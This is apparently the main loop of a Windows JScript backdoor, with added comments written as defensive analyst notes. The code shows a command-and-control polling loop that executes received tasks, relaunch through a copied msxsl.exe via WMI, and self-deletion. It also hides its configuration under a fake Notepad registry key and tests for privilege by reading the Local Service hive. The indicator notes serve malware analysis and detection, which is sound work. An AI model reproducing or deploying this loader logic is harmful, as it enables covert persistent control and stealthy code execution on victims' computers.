if (PreserveH === "") {
PreserveH = bot_header();
}
// Configuration value location: <rootK>\Software\Microsoft\Notepad\<computer or user name>.
if (xStore === "") {
var valo = "\\Software\\Microsoft\\Notepad\\";
if (SYSTEM === 1) {
xStore = rootK + valo + PCN;
} else {
xStore = rootK + valo + UNM;
}
}
rcon_now += 1;
if (rcon_now >= rcon_max) {
// Iteration budget exhausted: start a fresh instance from fCore and, if that worked,
// let this one end (gtfo = true).
try {
if (fexist(fCore) === true) {
mainCommand = dq2 + main_mitm + dq2 + " " + dq2 + fCore + dq2 + " " + dq2 + fCore + dq2;
ret8 = wmi_command(mainCommand, 0);
if (ret8 == true) {
gtfo = true;
} else {
// The trailing `2` is a stray expression statement with no effect.
gtfo = false;2
}
}
} catch (ez12) {
gtfo = false;
}
} else {
// Poll the gate: "gErr" = request failed (short wait), "OK" = nothing to do,
// anything else is treated as a task string.
HitNow = hit_Gate(Gate, PreserveH, 1, 0);
switch (HitNow) {
case "gErr":
wmi_waitfor(error_retry);
break;
case "OK":
break;
default:
eTask(HitNow);
}
}
if (gtfo === false) {
wmi_waitfor(hit_each);
} else {
// Only after a successful "gtfo" task (selfdel set): remove the msxsl.exe copy as well.
if (selfdel === true && fexist(main_mitm) === true) {
wmi_command('cmd.exe /c del "' + main_mitm + dq2, 0);
}
}
}
/**
 * Gatekeeper in front of main(): the polling step only runs when both check_Net(0) and
 * check_Host(0) return true; otherwise the function waits through wmi_waitfor2().
 *
 * check_Host and wmi_waitfor2 are defined outside this view, so what the host check tests
 * and what the second wmi_waitfor2 argument means cannot be stated from here.
 */
function go() {
if (check_Net(0) === true) {
if (check_Host(0) === true) {
main();
} else {
// Network reachable but host check failed: wait with the normal polling interval.
wmi_waitfor2(hit_each, 1);
}
} else {
// No network: wait with a fixed interval of 3.
wmi_waitfor2(3, 1);
}
}
/**
 * Verifies that the installation this script expects is present before the loop starts.
 *
 * Steps: resolve computer and user name, derive the registry location xStore, read the
 * value stored there, and require it to hold exactly three comma-separated fields. The
 * second and third fields name the ".txt" files fCore and fStart under workingDir; both
 * files and main_mitm must exist.
 *
 * @returns {boolean} true only when the registry value parses and all three files exist.
 *
 * Analyst notes (defensive):
 *  - Indicators derivable from this function: a value under
 *    `<HKLM|HKCU>\Software\Microsoft\Notepad\` named after the computer name (SYSTEM === 1)
 *    or the user name, holding "a,b,c"; plus `<workingDir>b.txt`, `<workingDir>c.txt` and
 *    `<workingDir>msxsl.exe`.
 *  - If anything throws while SYSTEM === 1 (for example the registry read), the function
 *    switches to the per-user locations (HKCU, APPDATA) and retries once.
 */
function check_inside() {
var x1;
var Note;
var Sp;
var net;
if ((UNM === "") || (PCN === "")) {
try {
net = obj('WScript.Network');
PCN = net.ComputerName;
UNM = net.UserName;
} catch (e781) {
// Placeholder names keep the registry path well-formed when the lookup fails.
PCN = "pc_error";
UNM = "user_error";
}
}
if (xStore === "") {
var valo = "\\Software\\Microsoft\\Notepad\\";
if (SYSTEM === 1) {
xStore = rootK + valo + PCN;
} else {
xStore = rootK + valo + UNM;
}
}
try {
x1 = obj("WScript.Shell");
Note = x1.RegRead(xStore);
if (Note) {
if (Note.indexOf(",") !== -1) {
Sp = Note.split(",");
if (Sp.length === 3) {
// Field 0 is not used here; eTask's "gtfo" branch uses it as the Run-key value name.
fCore = workingDir + Sp[1] + ".txt";
fStart = workingDir + Sp[2] + ".txt";
if (fexist(fCore) === false) {
return false;
}
if (fexist(fStart) === false) {
return false;
}
if (fexist(main_mitm) === false) {
return false;
}
return true;
} else {
return false;
}
} else {
return false;
}
} else {
return false;
}
} catch (e89) {
if (SYSTEM === 1) {
// Fall back from the machine-wide locations to the per-user ones and try again;
// SYSTEM is now 0, so a second failure ends in `return false`.
SYSTEM = 0;
rootK = "HKCU";
xApp = myEnv("APPDATA", 0);
workingDir = xApp + "\\Microsoft\\";
main_mitm = workingDir + "msxsl.exe";
xStore = "";
return check_inside();
} else {
return false;
}
}
}
/**
 * Privilege probe: tries to read HKEY_USERS\S-1-5-19\Environment\TEMP.
 *
 * S-1-5-19 is the well-known SID of the Local Service account. Reading that hive is a
 * common way to test for an elevated context, because it is presumably not readable by a
 * standard user - the code itself only shows that a successful, non-empty read yields true.
 *
 * @returns {boolean} true when the value could be read and is non-empty, false otherwise
 *                    (including when the read throws).
 */
function sys() {
var sh11;
var tez = "";
var sys123 = "HKEY_USERS\\S-1-5-19\\Environment\\TEMP";
try {
sh11 = obj("WScript.Shell");
tez = sh11.RegRead(sys123);
if (tez) {
return true;
} else {
return false;
}
} catch (e181) {
return false;
}
}
// Start-up sequence: choose machine-wide or per-user locations, derive the working paths,
// and enter the loop only when check_inside() confirms the expected installation.
if (sys() === true) {
// Privileged context: registry root HKLM and the folder returned by sFolder(35).
// NOTE(review): 35 matches the shell special-folder id for the common application-data
// folder; sFolder is defined outside this view - confirm.
SYSTEM = 1;
rootK = "HKLM";
xApp = sFolder(35);
if (xApp === false) {
xApp = myEnv("APPDATA", 0);
}
} else {
xApp = myEnv("APPDATA", 0);
}
// Paths used throughout: <TMP>\ for captured command output, <xApp>\Microsoft\ for the
// stored ".txt" files and the msxsl.exe copy.
xTmp = myEnv("TMP", 0) + "\\";
workingDir = xApp + "\\Microsoft\\";
main_mitm = workingDir + "msxsl.exe";
// When the registry value or any of the three files is missing, the script does nothing.
if (check_inside() == true) {
go();
}